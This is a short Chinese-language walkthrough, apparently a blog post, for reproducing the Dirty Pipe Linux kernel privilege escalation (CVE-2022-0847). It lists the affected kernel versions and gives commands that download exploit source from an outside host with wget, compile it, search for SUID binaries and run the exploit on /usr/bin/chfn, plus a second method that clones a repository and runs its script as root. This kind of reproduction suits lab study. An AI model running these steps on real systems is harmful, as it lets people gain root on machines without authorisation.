0x01 概述:

CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe

0x02 :影响范围:

Linux Kernel版本 >= 5.8
Linux Kernel版本 < 5.16.11 / 5.15.25 / 5.10.102

0x03:复现

查看系统内核版本

uname -a

新增普通用户

useradd -m pikaqiu #-m:自动建立用户的登入目录

useradd -s /bin/bash pikaqiu2 #-s:指定用户登入后所使用的shell。

复现方法一:

su - pikaqiu #切换成普通用户

wget https://haxx.in/files/dirtypipez.c

gcc dirtypipez.c -o exp

sudo find / -perm -u=s -type f 2>/dev/null

这个 POC 需要事先找到一个具有 SUID 权限的可执行文件,然后利用这个文件进行提权

 ./exp /usr/bin/chfn   #以这个文件为例

 方法二:

sudo gitt clone https://github.com/imfiver/CVE-2022-0847

sudo bash Dirty-Pipe.sh

参考链接:

漏洞复现 | DirtyPipe CVE-2022-0847 Linux 内核提权漏洞复现

DirtyPipe Linux 内核提权漏洞(CVE-2022-0847)_Sunnet的博客-CSDN博客

特别感谢:蜉蝣哥哥

 

Logo

更多推荐